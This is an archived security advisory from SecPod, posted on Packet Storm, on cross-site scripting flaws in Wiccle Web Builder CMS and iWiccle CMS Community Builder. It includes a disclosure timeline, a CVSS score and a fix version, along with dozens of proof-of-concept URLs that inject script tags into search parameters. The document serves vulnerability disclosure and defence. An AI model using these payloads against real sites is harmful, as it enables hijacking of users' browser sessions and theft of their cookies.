what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Wiccle Web Builder CMS / iWiccle CMS Community Builder Cross Site Scripting

Wiccle Web Builder CMS / iWiccle CMS Community Builder Cross Site Scripting
Posted Oct 22, 2010
Authored by Veerendra G.G | Site secpod.com

Wiccle Web Builder CMS and iWiccle CMS Community Builder both suffer from multiple cross site scripting vulnerabilities.

tags | exploit, web, vulnerability, xss
SHA-256 | 131b387ddda597eea6f5958b0702c023bd31d235e6b60d19fce3e2b40dd9604d
Download | Favorite | View

Wiccle Web Builder CMS / iWiccle CMS Community Builder Cross Site Scripting

Change Mirror Download
##############################################################################
Wiccle Web Builder CMS and iWiccle CMS Community Builder Multiple Cross-Site
Scripting Vulnerability.

SecPod Technologies (www.secpod.com)
Author Veerendra G.G
###############################################################################

SecPod ID:      1005                            09/07/2010 Issue Discovered
                                                09/10/2010 Vendor Notified
                                                09/13/2010 Vendor Confirmed
                                                09/14/2010 Fix Available


Class: Cross-Site Scripting                     Severity: Medium


Overview:
---------
Wiccle Web Builder CMS and iWiccle CMS Community Builder is prone to multiple
Cross-Site Scripting Vulnerabilities.


Technical Description:
----------------------
Wiccle Web Builder CMS and iWiccle CMS Community Builder is prone to multiple
Cross-Site vulnerabilities because it fails to properly sanitize user-supplied input.

NOTE: Vulnerability is exploitable, when magic_quotes_gpc is Off (magic_quotes_gpc = Off)

1) Input passed via the 'member_city' parameter to 'index.php' when 'module' is
   set to 'dating' and 'show' is set to 'member_search' is not properly verified
   before it is returned to the user.

   NOTE: This vulnerability exists only in Wiccle Web Builder CMS

   POC:
   * http://<Target_IP>/wwb_101/index.php?module=dating&show=member_search&member_gender=male&member_country=all&member_city=<script>alert('XSS-Test')<%2Fscript>&member_min_age=18&member_max_age=30&member_photo=1

   * http://<Target_IP>/wwb_101/index.php?module=dating&show=member_search&member_gender=male&member_country=all&member_city=<script>alert('XSS-Test')<%2Fscript>&member_min_age=18&member_max_age=30


2) Input passed via the 'post_name', 'post_text', 'post_tag', 'post_member_name'
   parameter to 'index.php' when 'module' is set to various (Auctions, Audio etc.,)
   options and 'show' is set to 'post_search' is not properly verified before
   it is returned to the user.

   NOTE: This vulnerability exists in both the products (Wiccle Web Builder CMS
          and iWiccle CMS Community Builder).

   POC:
   * http://<Target_IP>/wwb_101/index.php?module=articles&show=post_search&post_name=<script>alert('XSS-Test')<%2Fscript>&post_text=<script>alert('XSS-Test')<%2Fscript>&post_tags=<script>alert('XSS-Test')<%2Fscript>&post_member_name=<script>alert('XSS-Test')<%2Fscript>

   * http://<Target_IP>/iwiccle_1211/index.php?module=articles&show=post_search&post_name=<script>alert('XSS-Test')<%2Fscript>&post_text=<script>alert('XSS-Test')<%2Fscript>&post_tags=<script>alert('XSS-Test')<%2Fscript>&post_member_name=<script>alert('XSS-Test')<%2Fscript>


3) Input passed via the 'member_username', 'member_tags' parameter to 'index.php'
   when 'module' is set to 'members' and 'show' is set to 'member_search' is not
   properly verified before it is returned to the user.

   NOTE: This vulnerability exists in both the products (Wiccle Web Builder CMS
          and iWiccle CMS Community Builder).

   POC:
   * http://<Target_IP>/wwb_101/index.php?module=members&show=member_search&member_username=<script>alert('XSS-Test')<%2Fscript>&member_tags=<script>alert('XSS-Test')<%2Fscript>

   * http://<Target_IP>/iwiccle_1211/index.php?module=members&show=member_search&member_username=<script>alert('XSS-Test')<%2Fscript>&member_tags=<script>alert('XSS-Test')<%2Fscript>


These can be exploited to execute arbitrary HTML and script code in a user's
browser session in the context of a vulnerable site. This may allow an attacker
to steal cookie-based authentication and launch further attacks.

The exploit has been tested in Wiccle Web Builder CMS 2.0 (wwb_101.zip) and
iWiccle CMS Community Builder (iwiccle_1211.zip)


Impact:
--------
Successful exploitation could allow an attacker to execute arbitrary HTML and
script code in a user's browser session in the context of a vulnerable site.


Affected Software:
------------------
Wiccle Web Builder CMS 2.0 (wwb_101.zip)
iWiccle CMS Community Builder 2.0 (iwiccle_1211.zip)


References:
-----------
http://www.wiccle.com/
http://secpod.org/blog/?p=130
http://wiccle.com/download/wwb_101.zip
http://wiccle.com/download/iwiccle_1211.zip
http://secpod.org/advisories/SECPOD_Wiccle_Web_Builder_and_iWiccle_CMS_Community_Builder.txt
http://www.wiccle.com/news/backstage_news/iwiccle/post/iwiccle_cms_community_builder_130_releas


Proof of Concepts:
-----------------
   NOTE: It is exploitable, when magic_quotes_gpc is Off (magic_quotes_gpc = Off)

   * http://<Target_IP>/wwb_101/index.php?module=dating&show=member_search&member_gender=male&member_country=all&member_city=<script>alert('XSS-Test')<%2Fscript>&member_min_age=18&member_max_age=30&member_photo=1

   * http://<Target_IP>/wwb_101/index.php?module=dating&show=member_search&member_gender=male&member_country=all&member_city=<script>alert('XSS-Test')<%2Fscript>&member_min_age=18&member_max_age=30

   * http://<Target_IP>/wwb_101/index.php?module=articles&show=post_search&post_name=<script>alert('XSS-Test')<%2Fscript>&post_text=<script>alert('XSS-Test')<%2Fscript>&post_tags=<script>alert('XSS-Test')<%2Fscript>&post_member_name=<script>alert('XSS-Test')<%2Fscript>

   * http://<Target_IP>/iwiccle_1211/index.php?module=articles&show=post_search&post_name=<script>alert('XSS-Test')<%2Fscript>&post_text=<script>alert('XSS-Test')<%2Fscript>&post_tags=<script>alert('XSS-Test')<%2Fscript>&post_member_name=<script>alert('XSS-Test')<%2Fscript>

   * http://<Target_IP>/wwb_101/index.php?module=members&show=member_search&member_username=<script>alert('XSS-Test')<%2Fscript>&member_tags=<script>alert('XSS-Test')<%2Fscript>

   * http://<Target_IP>/iwiccle_1211/index.php?module=members&show=member_search&member_username=<script>alert('XSS-Test')<%2Fscript>&member_tags=<script>alert('XSS-Test')<%2Fscript>


Other POC's:
-------------
  http://<Target_IP>/wwb_101/index.php?module=articles&show=post_search&post_text=<script>alert('XSS-Test')</script>
  http://<Target_IP>/iwiccle_1211/index.php?module=articles&show=post_search&post_text=<script>alert('XSS-Test')</script>

  http://<Target_IP>/wwb_101/index.php?module=blogs&show=post_search&post_text=<script>alert('XSS-Test')</script>
  http://<Target_IP>/iwiccle_1211/index.php?module=blogs&show=post_search&post_text=<script>alert('XSS-Test')</script>

  http://<Target_IP>/wwb_101/index.php?module=gallery&show=post_search&post_text=<script>alert('XSS-Test')</script>
  http://<Target_IP>/iwiccle_1211/index.php?module=gallery&show=post_search&post_text=<script>alert('XSS-Test')</script>

  http://<Target_IP>/wwb_101/index.php?module=news&show=post_search&post_text=<script>alert('XSS-Test')</script>
  http://<Target_IP>/iwiccle_1211/index.php?module=news&show=post_search&post_text=<script>alert('XSS-Test')</script>

  http://<Target_IP>/wwb_101/index.php?module=store&show=post_search&post_text=<script>alert('XSS-Test')</script>

  http://<Target_IP>/wwb_101/index.php?module=video&show=post_search&post_text=<script>alert('XSS-Test')</script>
  http://<Target_IP>/iwiccle_1211/index.php?module=video&show=post_search&post_text=<script>alert('XSS-Test')</script>

  http://<Target_IP>/wwb_101/index.php?module=links&show=post_search&post_text=<script>alert('XSS-Test')</script>
  http://<Target_IP>/iwiccle_1211/index.php?module=links&show=post_search&post_text=<script>alert('XSS-Test')</script>

  http://<Target_IP>/wwb_101/index.php?module=events&show=post_search&post_text=<script>alert('XSS-Test')</script>
  http://<Target_IP>/iwiccle_1211/index.php?index.php?module=events&show=post_search&post_text=<script>alert('XSS-Test')</script>

  http://<Target_IP>/wwb_101/index.php?module=downloads&show=post_search&post_text=<script>alert('XSS-Test')</script>

  http://<Target_IP>/wwb_101/index.php?module=guestbook&show=post_search&post_text=<script>alert('XSS-Test')</script>

  http://<Target_IP>/wwb_101/index.php?module=help&show=post_search&post_text=<script>alert('XSS-Test')</script>

  http://<Target_IP>/wwb_101/index.php?module=notebox&show=post_search&post_text=<script>alert('XSS-Test')</script>

  http://<Target_IP>/wwb_101/index.php?module=polls&show=post_search&post_text=<script>alert('XSS-Test')</script>

  http://<Target_IP>/wwb_101/index.php?module=portfolio&show=post_search&post_text=<script>alert('XSS-Test')</script>

  http://<Target_IP>/wwb_101/index.php?module=support&show=post_search&post_text=<script>alert('XSS-Test')</script>


Workaround:
-----------
Not available


Solution:
---------
iWiccle CMS Community Builder 1.3.0 (iwiccle_130.zip)
http://www.wiccle.com/news/backstage_news/iwiccle/post/iwiccle_cms_community_builder_130_releas


Risk Factor:
-------------
    CVSS Score Report
        ACCESS_VECTOR          = NETWORK
        ACCESS_COMPLEXITY      = MEDIUM
        AUTHENTICATION         = NONE
        CONFIDENTIALITY_IMPACT = NONE
        INTEGRITY_IMPACT       = PARTIAL
        AVAILABILITY_IMPACT    = NONE
        EXPLOITABILITY         = PROOF_OF_CONCEPT
        REMEDIATION_LEVEL      = UNAVAILABLE
        REPORT_CONFIDENCE      = CONFIRMED
        CVSS Base Score        = 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N)

Credits:
--------
Veerendra G.G of SecPod Technologies has been credited with the discovery of
this vulnerability.

Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close